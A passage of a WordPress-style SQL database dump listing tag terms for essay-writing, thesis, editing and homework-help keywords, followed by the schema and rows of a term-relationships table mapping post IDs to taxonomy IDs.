(355, 'case sudy analisys', 'case-sudy-analisys', 0),
(356, 'best case studies', 'best-case-studies', 0),
(357, 'case study writer', 'case-study-writer', 0),
(358, 'case studies help', 'case-studies-help', 0),
(359, 'case study paper', 'case-study-paper', 0),
(360, 'case studies paper', 'case-studies-paper', 0),
(361, 'case study help', 'case-study-help', 0),
(362, 'online case studies', 'online-case-studies', 0),
(363, 'buy case studies', 'buy-case-studies', 0),
(364, 'case studies research', 'case-studies-research', 0),
(365, 'case studies helper', 'case-studies-helper', 0),
(366, 'online case study', 'online-case-study', 0),
(367, 'do my case studies', 'do-my-case-studies', 0),
(368, 'type my paper', 'type-my-paper', 0),
(369, 'pay someone to write my paper for me', 'pay-someone-to-write-my-paper-for-me', 0),
(370, 'help with my essay', 'help-with-my-essay', 0),
(371, 'assignment help c++', 'assignment-help-c', 0),
(372, 'assignment help desk', 'assignment-help-desk', 0),
(373, 'assignment help auckland', 'assignment-help-auckland', 0),
(374, 'assignment help blog', 'assignment-help-blog', 0),
(375, 'assignment help', 'assignment-help', 0),
(376, 'assignment help australia price', 'assignment-help-australia-price', 0),
(377, 'assignment help aus', 'assignment-help-aus', 0),
(378, 'assignment help chat', 'assignment-help-chat', 0),
(379, 'assignment help dubai', 'assignment-help-dubai', 0),
(380, 'assignment help china', 'assignment-help-china', 0),
(381, 'assignment help business', 'assignment-help-business', 0),
(382, 'assignment help india', 'assignment-help-india', 0),
(383, 'assignment help australia gumtree', 'assignment-help-australia-gumtree', 0),
(384, 'assignment help gumtree', 'assignment-help-gumtree', 0),
(385, 'assignment help bahrain', 'assignment-help-bahrain', 0),
(386, 'assignment help gumtree brisbane', 'assignment-help-gumtree-brisbane', 0),
(387, 'assignment helper online', 'assignment-helper-online', 0),
(388, 'uspto assignment help desk', 'uspto-assignment-help-desk', 0),
(389, 'assignment help cyprus', 'assignment-help-cyprus', 0),
(390, 'assignment help asap', 'assignment-help-asap', 0),
(391, 'assignment help in bangladesh', 'assignment-help-in-bangladesh', 0),
(392, 'assignment help club', 'assignment-help-club', 0),
(393, 'assignment help singapore', 'assignment-help-singapore', 0),
(394, 'assignment helper malaysia', 'assignment-helper-malaysia', 0),
(395, 'assignment help computer science', 'assignment-help-computer-science', 0),
(396, 'assignment help aged care', 'assignment-help-aged-care', 0),
(397, 'assignment help.com', 'assignment-help-com', 0),
(398, 'mba assignment help dubai', 'mba-assignment-help-dubai', 0),
(399, 'assignment help btec', 'assignment-help-btec', 0),
(400, 'paper editing', 'paper-editing', 0),
(401, 'college essay editing', 'college-essay-editing', 0),
(402, 'essay editing services', 'essay-editing-services', 0),
(403, 'essay editing service', 'essay-editing-service', 0),
(404, 'essays editing', 'essays-editing', 0),
(405, 'paper edit', 'paper-edit', 0),
(406, 'papers editing', 'papers-editing', 0),
(407, 'essay edit', 'essay-edit', 0),
(408, 'editing services', 'editing-services', 0),
(409, 'essays edit', 'essays-edit', 0),
(410, 'essay editor', 'essay-editor', 0),
(411, 'essay editing', 'essay-editing', 0),
(412, 'essay edit service', 'essay-edit-service', 0),
(413, 'college essay edit', 'college-essay-edit', 0),
(414, 'paper edits', 'paper-edits', 0),
(415, 'essay editors', 'essay-editors', 0),
(416, 'polish writing', 'polish-writing', 0),
(417, 'professional editor', 'professional-editor', 0),
(418, 'college editing', 'college-editing', 0),
(419, 'college essay editors', 'college-essay-editors', 0),
(420, 'paper editor', 'paper-editor', 0),
(421, 'online essay editor', 'online-essay-editor', 0),
(422, 'college essay editor', 'college-essay-editor', 0),
(423, 'professional editing', 'professional-editing', 0),
(424, 'college essay editing services', 'college-essay-editing-services', 0),
(425, 'editing papers', 'editing-papers', 0),
(426, 'editing services online', 'editing-services-online', 0),
(427, 'profesional editing', 'profesional-editing', 0),
(428, 'writing check', 'writing-check', 0),
(429, 'essay editor service', 'essay-editor-service', 0),
(430, 'polish my writing', 'polish-my-writing', 0),
(431, 'editing paper', 'editing-paper', 0),
(432, 'paper editing websites', 'paper-editing-websites', 0),
(433, 'someone to write an essay for me', 'someone-to-write-an-essay-for-me', 0),
(434, 'where can i hire someone to write my paper', 'where-can-i-hire-someone-to-write-my-paper', 0),
(435, 'please help me write my essay', 'please-help-me-write-my-essay', 0),
(436, 'website that writes essays for you', 'website-that-writes-essays-for-you', 0),
(437, 'pay for a paper to be written', 'pay-for-a-paper-to-be-written', 0),
(438, 'can any one write my paper', 'can-any-one-write-my-paper', 0),
(439, 'paper to type on', 'paper-to-type-on', 0),
(440, 'write my essay paper', 'write-my-essay-paper', 0),
(441, 'do an essay for me', 'do-an-essay-for-me', 0),
(442, 'who can do my essay for me', 'who-can-do-my-essay-for-me', 0),
(443, 'pay someone to write your research paper', 'pay-someone-to-write-your-research-paper', 0),
(444, 'is writemypapers reliable', 'is-writemypapers-reliable', 0),
(445, 'write my paper for money', 'write-my-paper-for-money', 0),
(446, 'who can i get to write my paper', 'who-can-i-get-to-write-my-paper', 0),
(447, 'looking for someone to write my paper', 'looking-for-someone-to-write-my-paper', 0),
(448, 'can someone write me an essay', 'can-someone-write-me-an-essay', 0),
(449, 'professional essays', 'professional-essays', 0),
(450, 'narrative essay', 'narrative-essay', 0),
(451, 'professional essay', 'professional-essay', 0),
(452, 'professional essay writers', 'professional-essay-writers', 0),
(453, 'bachelor thesis writing service', 'bachelor-thesis-writing-service', 0),
(454, 'do my thesis for me', 'do-my-thesis-for-me', 0),
(455, 'phd thesis writing service', 'phd-thesis-writing-service', 0),
(456, 'write my thesis statement', 'write-my-thesis-statement', 0),
(457, 'order thesis online', 'order-thesis-online', 0),
(458, 'thesis paper helper', 'thesis-paper-helper', 0),
(459, 'good thesis statement', 'good-thesis-statement', 0),
(460, 'can someone write my thesis for me', 'can-someone-write-my-thesis-for-me', 0),
(461, 'thesis helper', 'thesis-helper', 0),
(462, 'write my thesis paper', 'write-my-thesis-paper', 0),
(463, 'college thesis statement', 'college-thesis-statement', 0),
(464, 'best thesis statement', 'best-thesis-statement', 0),
(465, 'write my phd thesis', 'write-my-phd-thesis', 0),
(466, 'order thesis papers', 'order-thesis-papers', 0),
(467, 'write my thesis for me', 'write-my-thesis-for-me', 0),
(468, 'order thesis paper', 'order-thesis-paper', 0),
(469, 'thesis paper help', 'thesis-paper-help', 0),
(470, 'best thesis writing service', 'best-thesis-writing-service', 0),
(471, 'write my thesis', 'write-my-thesis', 0),
(472, 'masters thesis paper', 'masters-thesis-paper', 0),
(473, 'buy thesis online', 'buy-thesis-online', 0),
(474, 'help me write a thesis', 'help-me-write-a-thesis', 0),
(475, 'master thesis help', 'master-thesis-help', 0),
(476, 'masters thesis writing service', 'masters-thesis-writing-service', 0),
(477, 'order phd thesis', 'order-phd-thesis', 0),
(478, 'thesis help', 'thesis-help', 0),
(479, 'help me write a thesis statement', 'help-me-write-a-thesis-statement', 0),
(480, 'buy thesis', 'buy-thesis', 0),
(481, 'thesis help ireland', 'thesis-help-ireland', 0),
(482, 'thesis consulting help', 'thesis-consulting-help', 0),
(483, 'best thesis help', 'best-thesis-help', 0),
(484, 'dbq thesis help', 'dbq-thesis-help', 0),
(485, 'thesis helper free', 'thesis-helper-free', 0),
(486, 'creating a thesis help', 'creating-a-thesis-help', 0),
(487, 'thesis helper philippines', 'thesis-helper-philippines', 0),
(488, 'thesis help australia', 'thesis-help-australia', 0),
(489, 'm tech thesis help in delhi', 'm-tech-thesis-help-in-delhi', 0),
(490, 'thesis for the help by kathryn stockett', 'thesis-for-the-help-by-kathryn-stockett', 0),
(491, 'thesis helpers in ghana', 'thesis-helpers-in-ghana', 0),
(492, 'phd thesis help in bangalore', 'phd-thesis-help-in-bangalore', 0),
(493, 'thesis writing help in dubai', 'thesis-writing-help-in-dubai', 0),
(494, 'thesis help for research paper', 'thesis-help-for-research-paper', 0),
(495, 'help thesis statement examples', 'help-thesis-statement-examples', 0),
(496, 'writing a thesis help', 'writing-a-thesis-help', 0),
(497, 'easy exploratory paper topics', 'easy-exploratory-paper-topics', 0),
(498, 'college exploratory paper topics', 'college-exploratory-paper-topics', 0),
(499, 'exploratory paper topics about sports', 'exploratory-paper-topics-about-sports', 0),
(500, 'good topics for a exploratory paper', 'good-topics-for-a-exploratory-paper', 0),
(501, 'exploratory essays topics for college students', 'exploratory-essays-topics-for-college-students', 0),
(502, 'good exploratory paper topics', 'good-exploratory-paper-topics', 0),
(503, 'exploratory essays ideas', 'exploratory-essays-ideas', 0),
(504, 'exploratory essay ideas', 'exploratory-essay-ideas', 0),
(505, 'good exploratory essay topics', 'good-exploratory-essay-topics', 0),
(506, 'exploratory paper prompts', 'exploratory-paper-prompts', 0),
(507, 'top exploratory essays topics', 'top-exploratory-essays-topics', 0),
(508, 'good exploratory essays topics', 'good-exploratory-essays-topics', 0),
(509, 'exploratory essay topics for college students', 'exploratory-essay-topics-for-college-students', 0),
(510, 'simple exploratory paper topics', 'simple-exploratory-paper-topics', 0),
(511, 'top exploratory essay topics', 'top-exploratory-essay-topics', 0),
(512, 'college level exploratory paper topics', 'college-level-exploratory-paper-topics', 0),
(513, 'topics for an exploratory essay', 'topics-for-an-exploratory-essay', 0),
(514, 'paper writing', 'paper-writing', 0),
(515, 'research papers', 'research-papers', 0),
(516, 'professional writers', 'professional-writers', 0),
(517, 'cheap review', 'cheap-review', 0),
(518, 'best research paper writing service', 'best-research-paper-writing-service', 0),
(519, 'best research paper writing services', 'best-research-paper-writing-services', 0),
(520, 'custom research paper writing service', 'custom-research-paper-writing-service', 0),
(521, 'research paper writing services', 'research-paper-writing-services', 0),
(522, 'affordable writing companies', 'affordable-writing-companies', 0),
(523, 'affordable paper writing', 'affordable-paper-writing', 0),
(524, 'affordablepapers.com review', 'affordablepapers-com-review', 0),
(525, 'affordable writing websites', 'affordable-writing-websites', 0),
(526, 'affordable papers - chiefessays.net', 'affordable-papers-chiefessays-net', 0),
(527, 'affordable paper.net reviews', 'affordable-paper-net-reviews', 0),
(528, 'affordablepapers.com reviews', 'affordablepapers-com-reviews', 0),
(529, 'affordable quality websites', 'affordable-quality-websites', 0),
(530, 'affordable papers reviews', 'affordable-papers-reviews', 0),
(531, 'affordable writing', 'affordable-writing', 0),
(532, 'affordable essay - chiefessays.net', 'affordable-essay-chiefessays-net', 0),
(533, 'affordable papers.com', 'affordable-papers-com', 0),
(534, 'affordablepaper.net reviews', 'affordablepaper-net-reviews', 0),
(535, 'affordablepaper.net review', 'affordablepaper-net-review', 0),
(536, 'affordable papers.com review', 'affordable-papers-com-review', 0),
(537, 'affordable writing service', 'affordable-writing-service', 0),
(538, 'affordable essay', 'affordable-essay', 0),
(539, 'critical essay', 'critical-essay', 0),
(540, 'essay online', 'essay-online', 0),
(541, 'critical essay help', 'critical-essay-help', 0),
(542, 'essay help', 'essay-help', 0),
(543, 'essay help online', 'essay-help-online', 0),
(544, 'a term paper on poultry production and improvement', 'a-term-paper-on-poultry-production-and-improvement', 0),
(545, 'a and b term papers reviews', 'a-and-b-term-papers-reviews', 0),
(546, 'term paper cover page template', 'term-paper-cover-page-template', 0),
(547, 'term paper proposal', 'term-paper-proposal', 0),
(548, 'term paper body', 'term-paper-body', 0),
(549, 'term paper writing service', 'term-paper-writing-service', 0),
(550, 'a term paper on data processing', 'a-term-paper-on-data-processing', 0),
(551, 'term paper about education', 'term-paper-about-education', 0),
(552, 'term paper business', 'term-paper-business', 0),
(553, 'term paper apa format', 'term-paper-apa-format', 0),
(554, 'term paper apa format outline', 'term-paper-apa-format-outline', 0),
(555, 'a term paper on entrepreneurship', 'a-term-paper-on-entrepreneurship', 0),
(556, 'term paper cat', 'term-paper-cat', 0),
(557, 'term paper about abortion', 'term-paper-about-abortion', 0),
(558, 'term paper apa', 'term-paper-apa', 0),
(559, 'term paper examples', 'term-paper-examples', 0),
(560, 'term paper business ethics', 'term-paper-business-ethics', 0),
(561, 'term paper citations', 'term-paper-citations', 0),
(562, 'term paper cover', 'term-paper-cover', 0),
(563, 'sql begin and begin transaction', 'sql-begin-and-begin-transaction', 0),
(564, 'began vs begun meaning', 'began-vs-begun-meaning', 0),
(565, 'began vs begun grammar', 'began-vs-begun-grammar', 0),
(566, 'began vs begun grammar girl', 'began-vs-begun-grammar-girl', 0),
(567, 'begin vs began vs begun', 'begin-vs-began-vs-begun', 0),
(568, 'examples of began vs begun', 'examples-of-began-vs-begun', 0),
(569, 'began vs begun definition', 'began-vs-begun-definition', 0),
(570, 'began vs was begun', 'began-vs-was-begun', 0),
(571, 'begin began or begun', 'begin-began-or-begun', 0),
(572, 'i began vs i begun', 'i-began-vs-i-begun', 0),
(573, 'how to use began vs begun', 'how-to-use-began-vs-begun', 0),
(574, 'when to use began vs begun', 'when-to-use-began-vs-begun', 0),
(575, 'began vs had begun', 'began-vs-had-begun', 0),
(576, 'began vs begun example', 'began-vs-begun-example', 0),
(577, 'began to vs begun to', 'began-to-vs-begun-to', 0),
(578, 'just begun vs just begun', 'just-begun-vs-just-begun', 0),
(579, 'use of began vs begun', 'use-of-began-vs-begun', 0),
(580, 'had begun or has began', 'had-begun-or-has-began', 0),
(581, 'annotated bibliography', 'annotated-bibliography', 0),
(582, 'admission essay', 'admission-essay', 0),
(583, 'article critique', 'article-critique', 0),
(584, 'article critique writing', 'article-critique-writing', 0),
(585, 'cheap essay writing', 'cheap-essay-writing', 0),
(586, 'custom essay services', 'custom-essay-services', 0),
(587, 'essay services', 'essay-services', 0),
(588, 'academic writing and research', 'academic-writing-and-research', 0),
(589, 'academic writing do''s and don''ts', 'academic-writing-dos-and-donts', 0),
(590, 'academic writing sample', 'academic-writing-sample', 0),
(591, 'a guide to academic writing pdf', 'a-guide-to-academic-writing-pdf', 0),
(592, 'academic writing book pdf', 'academic-writing-book-pdf', 0),
(593, 'academic writing boot camp', 'academic-writing-boot-camp', 0),
(594, 'academic writing different from a letter', 'academic-writing-different-from-a-letter', 0),
(595, 'an academic writing sample', 'an-academic-writing-sample', 0),
(596, 'academic writing for graduate students', 'academic-writing-for-graduate-students', 0),
(597, 'academic writing coach', 'academic-writing-coach', 0),
(598, 'academic writing dissertation', 'academic-writing-dissertation', 0),
(599, 'academic writing audience', 'academic-writing-audience', 0),
(600, 'academic writing app', 'academic-writing-app', 0),
(601, 'academic writing articles', 'academic-writing-articles', 0),
(602, 'academic writing characteristics', 'academic-writing-characteristics', 0),
(603, 'a+ academic writing', 'a-academic-writing', 0),
(604, 'academic writing book', 'academic-writing-book', 0),
(605, 'example of chicago style outline research paper', 'example-of-chicago-style-outline-research-paper', 0),
(606, 'how do you cite yourself in a paper chicago style', 'how-do-you-cite-yourself-in-a-paper-chicago-style', 0),
(607, 'footnotes in a paper chicago style', 'footnotes-in-a-paper-chicago-style', 0),
(608, 'do headers go on first page of chicago manual of style paper', 'do-headers-go-on-first-page-of-chicago-manual-of-style-paper', 0),
(609, 'sample chicago citation style paper', 'sample-chicago-citation-style-paper', 0),
(610, 'chicago manual style issue paper', 'chicago-manual-style-issue-paper', 0),
(611, 'how to cite chicago style in paper sample', 'how-to-cite-chicago-style-in-paper-sample', 0),
(612, 'using chicago style in a paper', 'using-chicago-style-in-a-paper', 0),
(613, 'chicago manual of style citation footnotes example paper', 'chicago-manual-of-style-citation-footnotes-example-paper', 0),
(614, 'chicago style paper with foot notes', 'chicago-style-paper-with-foot-notes', 0),
(615, 'chicago manual of style paper format with titles', 'chicago-manual-of-style-paper-format-with-titles', 0),
(616, 'writing in chicago manual style paper example', 'writing-in-chicago-manual-style-paper-example', 0),
(617, 'essay style paper chicago', 'essay-style-paper-chicago', 0),
(618, 'chicago style for doing the biblography at the end of a paper do you need to put page number', 'chicago-style-for-doing-the-biblography-at-the-end-of-a-paper-do-you-need-to-put-page-number', 0),
(619, 'how to put titles in your paper in chicago style', 'how-to-put-titles-in-your-paper-in-chicago-style', 0),
(620, 'can you put images in a chicago style paper', 'can-you-put-images-in-a-chicago-style-paper', 0),
(621, 'how to write chicago manual of style paper on microsoft word', 'how-to-write-chicago-manual-of-style-paper-on-microsoft-word', 0),
(622, '“write college', 'write-college', 0),
(623, '“write college essay”', 'write-college-essay', 0),
(624, 'admission essays sale', 'admission-essays-sale', 0),
(625, 'geography homework help year 8', 'geography-homework-help-year-8', 0),
(626, 'cpm homework help chapter 9', 'cpm-homework-help-chapter-9', 0),
(627, 'year 7 history homework help', 'year-7-history-homework-help', 0),
(628, 'grade 8 homework help', 'grade-8-homework-help', 0),
(629, 'homework help year 7 history', 'homework-help-year-7-history', 0),
(630, 'grade 9 science homework help', 'grade-9-science-homework-help', 0),
(631, 'homework help 8 year old', 'homework-help-8-year-old', 0),
(632, '24/7 homework help', '247-homework-help', 0),
(633, 'grade 8 math homework help', 'grade-8-math-homework-help', 0),
(634, 'homework help 8th grade math', 'homework-help-8th-grade-math', 0),
(635, '24/7 homework help hotline', '247-homework-help-hotline', 0),
(636, 'math homework help grade 8', 'math-homework-help-grade-8', 0),
(637, 'grade 9 geography homework help', 'grade-9-geography-homework-help', 0),
(638, 'homework help grade 9', 'homework-help-grade-9', 0),
(639, 'chapter 8 homework help', 'chapter-8-homework-help', 0),
(640, 'math homework help 911', 'math-homework-help-911', 0),
(641, 'year 7 music homework help', 'year-7-music-homework-help', 0),
(642, 'homework help grade 8', 'homework-help-grade-8', 0),
(643, 'subject matter', 'subject-matter', 0),
(644, 'demonstrate their', 'demonstrate-their', 0),
(645, 'internet essay', 'internet-essay', 0),
(646, 'essay order', 'essay-order', 0),
(647, 'book review', 'book-review', 0),
(648, 'college students', 'college-students', 0),
(649, 'custom writing service', 'custom-writing-service', 0),
(650, 'custom essay writing', 'custom-essay-writing', 0),
(651, 'This really', 'this-really', 0);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_term_relationships`
--

CREATE TABLE IF NOT EXISTS `cyb_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_order` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `cyb_term_relationships`
--

INSERT INTO `cyb_term_relationships` (`object_id`, `term_taxonomy_id`, `term_order`) VALUES
(98, 2, 0),
(96, 2, 0),
(99, 2, 0),
(100, 2, 0),
(208, 3, 0),
(202, 3, 0),
(1079, 3, 0),
(2032, 3, 0),
(2134, 7, 0),
(2152, 3, 0),
(2125, 3, 0),
(2124, 3, 0),
(2133, 3, 0),
(2136, 11, 0),
(2136, 10, 0),
(2136, 9, 0),
(2136, 8, 0),
(2121, 8, 0),
(2343, 2, 0),
(2630, 1, 0),
(2631, 1, 0),
(2632, 1, 0),
(2633, 1, 0),
(2634, 1, 0),
(2635, 1, 0),
(2636, 1, 0),
(2637, 1, 0),
(2638, 1, 0),
(2639, 1, 0),
(2640, 1, 0),
(2641, 1, 0),
(2642, 1, 0),
(2643, 1, 0),
(2644, 1, 0),
(2645, 1, 0),
(2646, 1, 0),
(2647, 1, 0),
(2648, 1, 0),
(2649, 1, 0),
(2650, 1, 0),
(2651, 1, 0),
(2652, 1, 0),
(2653, 1, 0),
(2654, 1, 0),
(2655, 1, 0),
(2656, 1, 0),
(2657, 1, 0),
(2658, 1, 0),
(2659, 1, 0),
(2660, 1, 0),
(2661, 1, 0),
(2662, 1, 0),
(2663, 1, 0),
(2664, 1, 0),
(2665, 1, 0),
(2666, 1, 0),
(2667, 1, 0),
(2668, 1, 0),
(2669, 1, 0),
(2670, 1, 0),
(2671, 1, 0),
(2672, 1, 0),
(2673, 1, 0),
(2674, 1, 0),
(2675, 1, 0),
(2676, 1, 0),
(2677, 1, 0),
(2678, 1, 0),
(2688, 1, 0),
(2689, 1, 0),
(2690, 1, 0),
(2691, 1, 0),
(2692, 1, 0),
(2693, 1, 0),
(2694, 1, 0),
(2695, 1, 0),
(2696, 1, 0),
(2697, 1, 0),
(2698, 1, 0),
(2699, 1, 0),
(2700, 1, 0),
(2701, 1, 0),
(2702, 1, 0),
(2703, 1, 0),
(2704, 1, 0),
(2706, 1, 0),
(2708, 1, 0),
(2709, 1, 0),
(2710, 1, 0),
(2711, 1, 0),
(2712, 1, 0),
(2713, 1, 0),
(2714, 1, 0),
(2715, 1, 0),
(2716, 1, 0),
(2721, 1, 0),
(2722, 1, 0),
(2723, 1, 0),
(2724, 1, 0),
(2725, 1, 0),
(2726, 1, 0),
(2727, 1, 0),
(2728, 1, 0),
(2729, 1, 0),
(2730, 1, 0),
(2731, 1, 0),
(2745, 1, 0),
(2746, 1, 0),
(2747, 1, 0),
(2748, 1, 0),
(2749, 1, 0),
(2750, 1, 0),
(2751, 1, 0),
(2752, 1, 0),
(2753, 1, 0),
(2754, 1, 0),
(2755, 1, 0),
(2756, 1, 0),
(2757, 1, 0),
(2758, 1, 0),
(2759, 1, 0),
(2760, 1, 0),
(2761, 1, 0),
(2762, 1, 0),
(2763, 1, 0),
(2764, 1, 0),
(2765, 1, 0),
(2768, 1, 0),
(2768, 32, 0),
(2768, 25, 0),
(2773, 1, 0),
(2774, 1, 0),
(2775, 1, 0),
(2776, 1, 0),
(2777, 1, 0),
(2778, 1, 0),
(2779, 1, 0),
(2780, 1, 0),
(2781, 1, 0),
(2782, 1, 0),
(2783, 1, 0),
(2784, 1, 0),
(2785, 1, 0),
(2786, 1, 0),
(2787, 1, 0),
(2788, 1, 0),
(2789, 1, 0),
(2790, 1, 0),
(2791, 1, 0),
(2792, 1, 0),
(2793, 1, 0),
(2794, 1, 0),
(2795, 1, 0),
(2796, 1, 0),
(2797, 1, 0),
(2798, 1, 0),
(2799, 1, 0),
(2810, 1, 0),
(2811, 1, 0),
(2812, 1, 0),
(2813, 1, 0),
(2814, 1, 0),
(2815, 1, 0),
(2816, 1, 0),
(2817, 1, 0),
(2818, 1, 0),
(2819, 1, 0),
(2820, 1, 0),
(2821, 1, 0),
(2822, 1, 0),
(2823, 1, 0),
(2824, 1, 0),
(2825, 1, 0),
(2826, 1, 0),
(2827, 1, 0),
(2828, 1, 0),
(2829, 1, 0),
(2830, 1, 0),
(2831, 1, 0),
(2832, 1, 0),
(2833, 1, 0),
(2834, 1, 0),
(2835, 1, 0),
(2836, 1, 0),
(2837, 1, 0),
(2838, 1, 0),
(2839, 1, 0),
(2840, 1, 0),
(2841, 1, 0),
(2842, 1, 0),
(2843, 1, 0),
(2844, 1, 0),
(2845, 1, 0),
(2846, 1, 0),
(2847, 1, 0),
(2848, 1, 0),
(2849, 1, 0),
(2850, 1, 0),
(2851, 1, 0),
(2852, 1, 0),
(2856, 1, 0),
(2857, 1, 0),
(2858, 1, 0),
(2859, 1, 0),
(2859, 33, 0),
(2859, 34, 0),
(2859, 35, 0),
(2859, 36, 0),
(2859, 37, 0),
(2859, 38, 0),
(2859, 39, 0),
(2859, 40, 0),
(2859, 41, 0),
(2859, 42, 0),
(2859, 43, 0),
(2859, 44, 0),
(2859, 45, 0),
(2860, 1, 0),
(2861, 1, 0),
(2862, 1, 0),
(2863, 1, 0),
(2864, 1, 0),
(2865, 1, 0),
(2866, 1, 0),
(2867, 1, 0),
(2868, 1, 0),
(2869, 1, 0),
(2870, 1, 0),
(2871, 1, 0),
(2872, 1, 0),
(2873, 1, 0),
(2874, 1, 0),
(2875, 1, 0),
(2876, 1, 0),
(2877, 1, 0),
(2878, 1, 0),
(2879, 1, 0),
(2880, 1, 0),
(2881, 1, 0),
(2882, 1, 0),
(2883, 1, 0),
(2884, 1, 0),
(2885, 1, 0),
(2886, 1, 0),
(2887, 1, 0),
(2888, 1, 0),
(2889, 1, 0),
(2890, 1, 0),
(2891, 1, 0),
(2892, 1, 0),
(2893, 1, 0),
(2894, 1, 0),
(2895, 1, 0),
(2896, 1, 0),
(2897, 1, 0),
(2898, 1, 0),
(2899, 1, 0),
(2900, 1, 0),
(2901, 1, 0),
(2902, 1, 0),
(2903, 1, 0),
(2904, 1, 0),
(2905, 1, 0),
(2906, 1, 0),
(2907, 1, 0),
(2908, 1, 0),
(2909, 1, 0),
(2910, 1, 0),
(2911, 1, 0),
(2912, 1, 0),
(2913, 1, 0),
(2914, 1, 0),
(2915, 1, 0),
(2916, 1, 0),
(2917, 1, 0),
(2918, 1, 0),
(2919, 1, 0),
(2920, 1, 0),
(2920, 39, 0),
(2920, 46, 0),
(2920, 36, 0),
(2920, 35, 0),
(2920, 42, 0),
(2920, 47, 0),
(2920, 48, 0),
(2920, 38, 0),
(2920, 49, 0),
(2920, 50, 0),
(2920, 51, 0),
(2920, 52, 0),
(2921, 1, 0),
(2922, 1, 0),
(2923, 1, 0),
(2924, 1, 0),
(2925, 1, 0),
(2926, 1, 0),
(2927, 1, 0),
(2928, 1, 0),
(2929, 1, 0),
(2929, 53, 0),
(2929, 54, 0),
(2929, 55, 0),
(2929, 56, 0),
(2930, 1, 0),
(2931, 1, 0),
(2932, 1, 0),
(2933, 1, 0),
(2934, 1, 0),
(2935, 1, 0),
(2936, 1, 0),
(2937, 1, 0),
(2938, 1, 0),
(2939, 1, 0),
(2940, 1, 0),
(2942, 1, 0),
(2943, 1, 0),
(2944, 1, 0),
(2945, 1, 0),
(2946, 1, 0),
(2947, 1, 0),
(2948, 1, 0),
(2949, 1, 0),
(2950, 1, 0),
(2951, 1, 0),
(2952, 1, 0),
(2953, 1, 0),
(2954, 1, 0),
(2955, 1, 0),
(2956, 1, 0),
(2957, 1, 0),
(2958, 1, 0),
(2959, 1, 0),
(2960, 1, 0),
(2961, 1, 0),
(2962, 1, 0),
(2963, 1, 0),
(2964, 1, 0),
(2965, 1, 0),
(2966, 1, 0),
(2967, 1, 0),
(2968, 1, 0),
(2969, 1, 0),
(2970, 1, 0),
(2971, 1, 0),
(2972, 1, 0),
(2973, 1, 0),
(2974, 1, 0),
(2975, 1, 0),
(2976, 1, 0),
(2977, 1, 0),
(2978, 1, 0),
(2979, 1, 0),
(2980, 1, 0),
(2981, 1, 0),
(2982, 1, 0),
(2983, 1, 0),
(2984, 1, 0),
(2985, 1, 0),
(2986, 1, 0),
(2987, 1, 0),
(2988, 1, 0),
(2989, 1, 0),
(2990, 1, 0),
(2991, 1, 0),
(2992, 1, 0),
(2993, 1, 0),
(2994, 1, 0),
(2995, 1, 0),
(2996, 1, 0),
(2997, 1, 0),
(2998, 1, 0),
(2999, 1, 0),
(3000, 1, 0),
(3001, 1, 0),
(3002, 1, 0),
(3003, 1, 0),
(3004, 1, 0),
(3005, 1, 0),
(3006, 1, 0),
(3007, 1, 0),
(3008, 1, 0),
(3009, 1, 0),
(3010, 1, 0),
(3010, 57, 0),
(3010, 58, 0),
(3011, 1, 0),
(3012, 1, 0),
(3012, 59, 0),
(3012, 60, 0),
(3012, 61, 0),
(3012, 36, 0),
(3013, 1, 0),
(3014, 1, 0),
(3015, 1, 0),
(3016, 1, 0),
(3017, 1, 0),
(3018, 1, 0),
(3019, 1, 0),
(3020, 1, 0),
(3021, 1, 0),
(3022, 1, 0),
(3026, 1, 0),
(3027, 1, 0),
(3028, 1, 0),
(3029, 1, 0),
(3030, 1, 0),
(3031, 1, 0),
(3032, 1, 0),
(3033, 1, 0),
(3034, 1, 0),
(3035, 1, 0),
(3036, 1, 0),
(3037, 1, 0),
(3038, 1, 0),
(3039, 1, 0),
(3040, 1, 0),
(3041, 1, 0),
(3042, 1, 0),
(3043, 1, 0),
(3044, 1, 0),
(3045, 1, 0),
(3046, 1, 0),
(3047, 1, 0),
(3048, 1, 0),
(3049, 1, 0),
(3050, 1, 0),
(3051, 1, 0),
(3052, 1, 0),
(3053, 1, 0),
(3054, 1, 0),
(3055, 1, 0),
(3056, 1, 0),
(3057, 1, 0),
(3058, 1, 0),
(3059, 1, 0),
(3060, 1, 0),
(3061, 1, 0),
(3062, 1, 0),
(3063, 1, 0),
(3064, 1, 0),
(3065, 1, 0),
(3066, 1, 0),
(3067, 1, 0),
(3068, 1, 0),
(3069, 1, 0),
(3070, 1, 0),
(3071, 1, 0),
(3072, 1, 0),
(3073, 1, 0),
(3074, 1, 0),
(3075, 1, 0),
(3076, 1, 0),
(3077, 1, 0),
(3078, 1, 0),
(3079, 1, 0),
(3080, 1, 0),
(3081, 1, 0),
(3082, 1, 0),
(3083, 1, 0),
(3087, 1, 0),
(3088, 1, 0),
(3089, 1, 0),
(3090, 1, 0),
(3091, 1, 0),
(3092, 1, 0),
(3093, 1, 0),
(3094, 1, 0),
(3095, 1, 0),
(3096, 1, 0),
(3097, 1, 0),
(3098, 1, 0),
(3099, 1, 0),
(3100, 1, 0),
(3101, 1, 0),
(3102, 1, 0),
(3103, 1, 0),
(3104, 1, 0),
(3105, 1, 0),
(3106, 1, 0),
(3107, 1, 0),
(3108, 1, 0),
(3109, 1, 0),
(3110, 1, 0),
(3111, 1, 0),
(3112, 1, 0),
(3113, 1, 0),
(3114, 1, 0),
(3115, 1, 0),
(3116, 1, 0),
(3117, 1, 0),
(3120, 1, 0),
(3121, 1, 0),
(3122, 1, 0),
(3123, 1, 0),
(3124, 1, 0),
(3125, 1, 0),
(3126, 1, 0),
(3127, 1, 0),
(3128, 1, 0),
(3129, 1, 0),
(3130, 1, 0),
(3131, 1, 0),
(3132, 1, 0),
(3133, 1, 0),
(3134, 1, 0),
(3135, 1, 0),
(3136, 1, 0),
(3137, 1, 0),
(3138, 1, 0),
(3139, 1, 0),
(3140, 1, 0),
(3141, 1, 0),
(3142, 1, 0),
(3143, 1, 0),
(3144, 1, 0),
(3145, 1, 0),
(3146, 1, 0),
(3147, 1, 0),
(3150, 1, 0),
(3152, 1, 0),
(3153, 1, 0),
(3154, 1, 0),
(3155, 1, 0),
(3156, 1, 0),
(3157, 1, 0),
(3158, 1, 0),
